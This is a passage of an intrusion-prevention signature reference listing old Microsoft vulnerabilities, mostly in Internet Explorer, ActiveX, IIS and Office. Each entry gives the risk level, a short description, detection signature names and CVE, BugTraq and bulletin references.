HTTP_CSU-Microsoft-ASP.NET-Application-Folder-Information-Disclosure

References:

CVE-2006-1300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1300

BID-18920
http://www.securityfocus.com/bid/18920

OSVDB-27153
http://www.osvdb.org/27153

MS06-033
http://technet.microsoft.com/security/bulletin/MS06-033

HTTP-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution

About this vulnerability:

Code execution vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-149-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Buffer Overflow

Description:

There is a code execution vulnerability in Microsoft Excel. A remote attacker can exploit this vulnerability by persuading a user to open a malicious Excel document with a crafted DVAL record. Successful exploitation could allow the attacker to execute arbitrary code with the privileges of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
File-OLE_Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution

References:

CVE-2008-0111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0111

BID-28094
http://www.securityfocus.com/bid/28094

OSVDB-42722
http://www.osvdb.org/42722

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

HTTP-Microsoft-FrontPage-Server-Extensions-Cross-Site-Scripting

About this vulnerability:

Cross site scripting vulnerability in Microsoft FrontPage Server Extensions

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

FrontPage Server Extensions

Type:

Cross-site Scripting

Description:

The dynamically linked library fpadmdll.dll in Microsoft FrontPage Server Extensions fails to validate the value given in the 'operation' parameter. A remote attacker is able to inject arbitrary HTML or script code into the value of the parameter and use that code to execute cross site scripting attacks in the browsers of other users.

References:

CVE-2006-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0015

BID-17452
http://www.securityfocus.com/bid/17452

MS06-017
http://technet.microsoft.com/security/bulletin/MS06-017

HTTP-Microsoft-Help-Facility-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Help Facility ActiveX Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a vulnerability in certain versions of the Microsoft Help Facility ActiveX Controls. The vulnerability can be exploited by luring the target user to a hostile web server that can trigger and exploit the vulnerability. Successful exploitation leads to remote compromise of the client host, allowing the attacker to install bots or other malware on the client system.

Situation:

HTTP_SS-Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow

References:

CVE-2002-0693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0693

BID-5874
http://www.securityfocus.com/bid/5874

MS02-055
http://technet.microsoft.com/security/bulletin/MS02-055

HTTP-Microsoft-HTML-Help-ActiveX-Control-Remote-Code-Execution-Vulnerability

About this vulnerability:

Vulnerability in HTML Help ActiveX Control Can Allow Remote Code Execution

Risk:

Moderate

First detected in:

sgpkg-ips-96-1314

Last changed:

sgpkg-ips-1408-5242

Platform:

Windows 2000; Windows 2003; Windows XP

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in the Microsoft Windows HTML Help ActiveX control. The flaw is caused by an improper check during the processing of the parameters in HTML Help Control ActiveX Objects. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user.

References:

CVE-2007-0214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0214

BID-22478
http://www.securityfocus.com/bid/22478

OSVDB-31884
http://www.osvdb.org/31884

MS07-008
http://technet.microsoft.com/security/bulletin/MS07-008

HTTP-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution

About this vulnerability:

Code execution vulnerability in the tblinf32.dll ActiveX control in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-118-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a code execution vulnerability in the tblinf32.dll ActiveX control in Microsoft Internet Explorer. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution
File-Text_Microsoft-Ie-ActiveX-IObjectsafety-Implementation-Code-Execution

References:

CVE-2007-2216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2216

BID-25289
http://www.securityfocus.com/bid/25289

OSVDB-36396
http://www.osvdb.org/36396

MS07-045
http://technet.microsoft.com/security/bulletin/MS07-045

HTTP-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure

About this vulnerability:

Information disclosure vulnerability in Microsoft Internet Explorer

Risk:

Low

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Microsoft Internet Explorer. A successful attack results in the disclosure of information from a Web page on another domain.

Situation:

HTTP_SS-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
File-Text_Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure

References:

CVE-2008-1544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1544

BID-28379
http://www.securityfocus.com/bid/28379

MS08-031
http://technet.microsoft.com/security/bulletin/MS08-031

HTTP-Microsoft-IIS-Server-Name-Variable-Spoof

About this vulnerability:

SERVER_NAME variable spoof vulnerability in Microsoft IIS

Risk:

Moderate

First detected in:

sgpkg-ips-36-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IIS 5.0; IIS 5.1; IIS 6.0; Apache; Apache2

Type:

Malfunction

Description:

Microsoft IIS 5.x and 6.0 are vulnerable to SERVER_NAME variable spoofing. A remote attacker can exploit this vulnerability to disclose sensitive information.

Situation:

HTTP_CS-Server-Name-Variable-Spoof-2
HTTP_CS-Server-Name-Variable-Spoof

References:

CVE-2005-2678
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2678

HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass

About this vulnerability:

Unicode encoded request might bypass authentication

Risk:

High

First detected in:

sgpkg-ips-221-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Information Service (IIS) allows a remote unauthenticated attacker to bypass authentication leading to an unauthorized access.

Situation:

HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-5
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-4
HTTP_CSU-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-6
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-2
HTTP_CS-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-3

References:

CVE-2009-1535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535

BID-34993
http://www.securityfocus.com/bid/34993

MS09-020
http://technet.microsoft.com/security/bulletin/MS09-020

HTTP-Microsoft-IIS-WebDAV-Source-Code-Disclosure

About this vulnerability:

Source code disclosure vulnerability in Microsoft IIS 5.1

Risk:

Moderate

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 5.1

Type:

Malfunction

Description:

Microsoft Internet Information Server 5.1 has a vulnerability that allows remote users to request source code located on the server. This vulnerability is present only in configurations where the scripts are stored on a FAT or FAT32 partition and the server's operating system uses special settings in the Regional and Language Options.

Situation:

HTTP_CS-Microsoft-IIS-WebDAV-Source-Code-Disclosure

References:

BID-14764
http://www.securityfocus.com/bid/14764

HTTP-Microsoft-Internet-Explorer-Adodb.Connection-Execute-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Situation:

HTTP_SS-Vulnerable-Microsoft-Internet-Explorer-Function-Called
File-Text_Vulnerable-Microsoft-Internet-Explorer-Function-Called

References:

CVE-2006-5559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5559

BID-20704
http://www.securityfocus.com/bid/20704

OSVDB-31882
http://www.osvdb.org/31882

MS07-009
http://technet.microsoft.com/security/bulletin/MS07-009

HTTP-Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-77-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Buffer Overflow

Description:

Microsoft Internet Explorer has a memory corruption vulnerability in the handling of references to CLSIDs that reference certain COM objects that are not ActiveX controls. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary code execution on the victim's computer.

Situation:

HTTP_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

References:

CVE-2006-4495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4495

BID-19636
http://www.securityfocus.com/bid/19636

HTTP-Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption

About this vulnerability:

Buffer overflow vulnerability in the processing of crafted Content Advisor files in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the processing of crafted Content Advisor files in Internet Explorer. A successful exploitation of this vulnerability requires persuading a target user to open a specially crafted rat file, to install the rating system described in it and to access to Content Advisory settings after the rating system is installed, which leads to arbitrary code execution with the privileges of the currently logged in target user.

Situation:

HTTP_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
File-TextId_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption

References:

CVE-2005-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0555

BID-13117
http://www.securityfocus.com/bid/13117

OSVDB-15466
http://www.osvdb.org/15466

MS05-020
http://technet.microsoft.com/security/bulletin/MS05-020

HTTP-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in the handling of certain HTML tags containing a specially crafted CSS style attribute in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the handling of certain HTML tags containing a specially crafted CSS style attribute in Microsoft Internet Explorer. The vulnerability can be exploited remotely by persuading a user to visit a malicious web site with the vulnerable browser to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption

References:

CVE-2007-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1750

BID-24423
http://www.securityfocus.com/bid/24423

OSVDB-35349
http://www.osvdb.org/35349

MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033

HTTP-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can exploit this vulnerability with a crafted HTTP response and web page to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption

References:

CVE-2008-1085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1085

BID-28552
http://www.securityfocus.com/bid/28552

OSVDB-44205
http://www.osvdb.org/44205

MS08-024
http://technet.microsoft.com/security/bulletin/MS08-024

HTTP-Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of the Spline method in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-79-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of the Spline method in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.

Situation:

HTTP_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Daxctle.ocx-Spline-Method-Buffer-Overflow

References:

CVE-2006-4446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4446

BID-19738
http://www.securityfocus.com/bid/19738

OSVDB-28841
http://www.osvdb.org/28841

MS06-067
http://technet.microsoft.com/security/bulletin/MS06-067

HTTP-Microsoft-Internet-Explorer-IsComponentInstalled-BOF

About this vulnerability:

Detects Microsoft Internet Explorer IsComponentInstalled BOF exploits

Risk:

High

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Buffer Overflow

Description:

Microsoft Internet Explorer has a buffer overflow vulnerability concerning the IsComponentInstalled method. The vulnerability can be exploited by persuading a user to view a malicious web site that contains an IsComponentInstalled method call with an overly long first argument. A successful exploitation leads to arbitrary code excecution in the context of the user running the vulnerable browser.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-IsComponentInstalled-BOF
File-Text_Microsoft-Internet-Explorer-IsComponentInstalled-BOF

References:

CVE-2006-1016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1016

BID-16870
http://www.securityfocus.com/bid/16870

OSVDB-31647
http://www.osvdb.org/31647

HTTP-Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of excessively long MHTML URI strings in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

Internet Explorer has a buffer overflow vulnerability in the handling of excessively long MHTML URI strings. An exploitation of this vulnerability requires persuading a user running the vulnerable web browser to visit a crafted web page that contains an excessively long MHTML URI string as a link. When the malicious link is clicked by the target user, the vulnerability is triggered and the vulnerable browser terminated.

Situation:

HTTP_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow

References:

CVE-2006-2766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2766

BID-18198
http://www.securityfocus.com/bid/18198

OSVDB-25949
http://www.osvdb.org/25949

MS06-043
http://technet.microsoft.com/security/bulletin/MS06-043

HTTP-Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Internet Explorer allows code execution in the local security zone

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Input Validation

Description:

There is a vulnerability in the MHTML protocol handler of Microsoft Internet Explorer. A malicious, crafted URI can be used to load and execute code from a compressed HTML (CHM) file in the context of the local user.

Situation:

HTTP_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
File-Text_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability

References:

CVE-2004-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380

BID-9658
http://www.securityfocus.com/bid/9658

MS04-013
http://technet.microsoft.com/security/bulletin/MS04-013

HTTP-Microsoft-Internet-Explorer-PNG-Image-Rendering-Buffer-Overflow

About this vulnerability:

PNG image rendering buffer overflow in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0;

Type:

Buffer Overflow

Description:

The PNG decoder library of Internet Explorer has a vulnerability in the processing of the transparency data of PNG images. The library fails to validate the size of this data before it is copied into a fixed size buffer. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

HTTP_PNG-Image-With-Large-Data-Length-Value
E-Mail_BS-PNG-Image-With-Large-Data-Length-Value
File-PNG_PNG-Image-With-Large-Data-Length-Value

References:

CVE-2005-1211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1211

BID-13941
http://www.securityfocus.com/bid/13941

MS05-025
http://technet.microsoft.com/security/bulletin/MS05-025

HTTP-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-81-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Internet Explorer. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow

References:

CVE-2006-3730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3730

BID-19030
http://www.securityfocus.com/bid/19030

OSVDB-27110
http://www.osvdb.org/27110

MS06-057
http://technet.microsoft.com/security/bulletin/MS06-057

HTTP-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

Situation:

HTTP_SS-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow

References:

CVE-2006-4868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868

BID-20096
http://www.securityfocus.com/bid/20096

OSVDB-28946
http://www.osvdb.org/28946

MS06-055
http://technet.microsoft.com/security/bulletin/MS06-055

HTTP-Microsoft-Isa-Server-HTTP-Request-Smuggling

About this vulnerability:

Microsoft ISA server HTTP request smuggling vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft ISA Server

Type:

Malfunction

Description:

Microsoft ISA Server 2000 has an HTTP request smuggling vulnerability. The web cache of Microsoft ISA server can be poisoned by sending a crafted HTTP request containing multiple content-length header fields. An attacker that exploits this vulnerability succesfully can bypass ISA server content restrictions.

References:

CVE-2005-1215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1215

BID-13956
http://www.securityfocus.com/bid/13956

OSVDB-17311
http://www.osvdb.org/17311

MS05-034
http://technet.microsoft.com/security/bulletin/MS05-034

HTTP-Microsoft-Management-Console-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Management Console allows cross site scripting

Risk:

High

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4

Software:

<os>

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in the Microsoft Windows, which allows Microsoft Management Console components to be referenced from a web page. This can be used to execute code in the local zone leading to system compromise.

Situation:

HTTP_Microsoft-Management-Console-Cross-Site-Scripting
File-Text_Microsoft-Management-Console-Cross-Site-Scripting

References:

CVE-2006-3643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3643

BID-19417
http://www.securityfocus.com/bid/19417

MS06-044
http://technet.microsoft.com/security/bulletin/MS06-044

HTTP-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service

About this vulnerability:

Null pointer dereference vulnerability in the Microsoft Office 2003 DataSourceControl ActiveX control

Risk:

Moderate

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a null pointer dereference vulnerability in the Microsoft Office 2003 DataSourceControl ActiveX control. A successful exploit leads to a denial of service terminating Internet Explorer.

Situation:

HTTP_SS-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service
File-Text_Microsoft-Office-MSODataSourceControl-ActiveX-Denial-Of-Service

References:

BID-24462
http://www.securityfocus.com/bid/24462

HTTP-Microsoft-Office-Web-Components-Datasource-Code-Execution

About this vulnerability:

File creation vulnerability in Microsoft Web Components Control ActiveX control

Risk:

High

First detected in:

sgpkg-ips-149-2032

Last changed:

sgpkg-ips-1710-5242

Platform:

Windows

Software:

Microsoft Office Web Components

Type:

Malfunction

Description:

There is a file creation vulnerability in Microsoft Web Components Control ActiveX control. A remote attacker can exploit this vulnerability via a specially crafted web page to create arbitrary files on the target system.

Situation:

HTTP_SS-Microsoft-Office-Web-Components-Datasource-Code-Execution
File-Text_Microsoft-Office-Web-Components-Datasource-Code-Execution

References:

CVE-2007-1201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1201

BID-28136
http://www.securityfocus.com/bid/28136

OSVDB-42712
http://www.osvdb.org/42712

MS08-017
http://technet.microsoft.com/security/bulletin/MS08-017

HTTP-Microsoft-OLE-Automation-String-Manipulation-Heap-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Microsoft Object Linking and Embedding Automation library

Risk:

Moderate

First detected in:

sgpkg-ips-121-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft Object Linking and Embedding Automation library. The vulnerability is due to a lack of parameter checking in the substringData method. By enticing a user to visit a crafted web site, a remote attacker can execute non-privileged arbitrary code.

Situation:

HTTP_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
File-Text_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption

References:

CVE-2007-2224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2224

BID-25282
http://www.securityfocus.com/bid/25282

MS07-043
http://technet.microsoft.com/security/bulletin/MS07-043

HTTP-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Print Spooler Service Addprinter function

Risk:

High

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Print Spooler service in Windows 2000, Windows XP, and Windows Server 2003 before patch MS05-043 suffer from a buffer overflow vulnerability. A malicious AddPrinter function call to the SPOOLS interface can be used by remote attackers to execute arbitrary code on a vulnerable system.

Situation:

MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinterEx-Buffer-Overflow
MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow
MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow-1

References:

CVE-2005-1984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1984

BID-14514
http://www.securityfocus.com/bid/14514

MS05-043
http://technet.microsoft.com/security/bulletin/MS05-043

HTTP-Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service

About this vulnerability:

A malformed data transfer request to Microsoft SMTP Service can cause denial of service

Risk:

Low

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Microsoft SMTP Service suffers from a denial of service vulnerability when processing data transfer request command.

Situation:

SMTP_Microsoft-SMTP-Service-Data-Transfer-Command-Denial-Of-Service

References:

CVE-2002-0055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0055

BID-4204
http://www.securityfocus.com/bid/4204

MS02-012
http://technet.microsoft.com/security/bulletin/MS02-012

HTTP-Microsoft-Troubleshooter-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Troubleshooter ActiveX Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ActiveX

Type:

Buffer Overflow

Description:

There is a vulnerability in certain versions of the Microsoft Troubleshooter ActiveX Control. The vulnerability can be exploited by luring the target user to a hostile web server that can trigger and exploit the vulnerability. Successful exploitation leads to remote compromise of the client host, allowing the attacker to install bots or other malware on the client system.

Situation:

HTTP_SS-Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow

References:

CVE-2003-0662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0662

BID-8833
http://www.securityfocus.com/bid/8833

MS03-042
http://technet.microsoft.com/security/bulletin/MS03-042

HTTP-Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Code-Execution

About this vulnerability:

Access control vulnerability in Microsoft Visual Studio 2005

Risk:

Moderate

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Studio 2005

Type:

Malfunction

Description:

There is an access control vulnerability in Microsoft Visual Studio 2005. The vulnerability can be exploited by persuading a target user to view a malicious HTML page. This allows non-privileged code execution.

Situation:

HTTP_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage
File-Text_Microsoft-Visual-Studio-WMI-Object-Broker-ActiveX-Control-Usage

References:

CVE-2006-4704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4704

BID-20843
http://www.securityfocus.com/bid/20843

MS06-073
http://technet.microsoft.com/security/bulletin/MS06-073

HTTP-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Windows ActiveX Control hxvz.dll

Risk:

High

First detected in:

sgpkg-ips-151-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Help

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Windows ActiveX Control hxvz.dll. A remote attacker can exploit this vulnerability via a specially crafted web page to execute arbitrary code on the victim's host with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
File-Text_Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption

References:

CVE-2008-1086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1086

BID-28606
http://www.securityfocus.com/bid/28606

MS08-023
http://technet.microsoft.com/security/bulletin/MS08-023

HTTP-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Windows Graphics Device Interface (GDI)

Risk:

High

First detected in:

sgpkg-ips-150-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft Windows Graphics Device Interface (GDI). A remote attacker can exploit this vulnerability by persuading a user to open a malicious EMF file or to visit an EMF-embedded web page. Successful exploitation could allow the attacker to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
File-Binary_Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow

References:

CVE-2008-1087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1087

BID-28570
http://www.securityfocus.com/bid/28570

OSVDB-44215
http://www.osvdb.org/44215

MS08-021
http://technet.microsoft.com/security/bulletin/MS08-021

HTTP-Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow

About this vulnerability:

Microsoft Windows Media Player suffers buffer overflow in playlist parsing

Risk:

Moderate

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

There is a buffer overflow in the way Microsoft Windows Media Player handles references to unregistered protocols in playlists.

Situation:

HTTP_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
File-TextId_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow

References:

CVE-2006-6134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6134

BID-21247
http://www.securityfocus.com/bid/21247

MS06-078
http://technet.microsoft.com/security/bulletin/MS06-078

HTTP-Microsoft-Windows-Shell-MSHTA-Script-Execution

About this vulnerability:

Script code execution vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a script code execution vulnerability in Windows. The vulnerability can be exploited by persuading a user to attempt to open a specially crafted OLE Compound file with an unregistered file extension by double-clicking it, causing arbitrary script code execution with the privileges of the currently logged in user.

Situation:

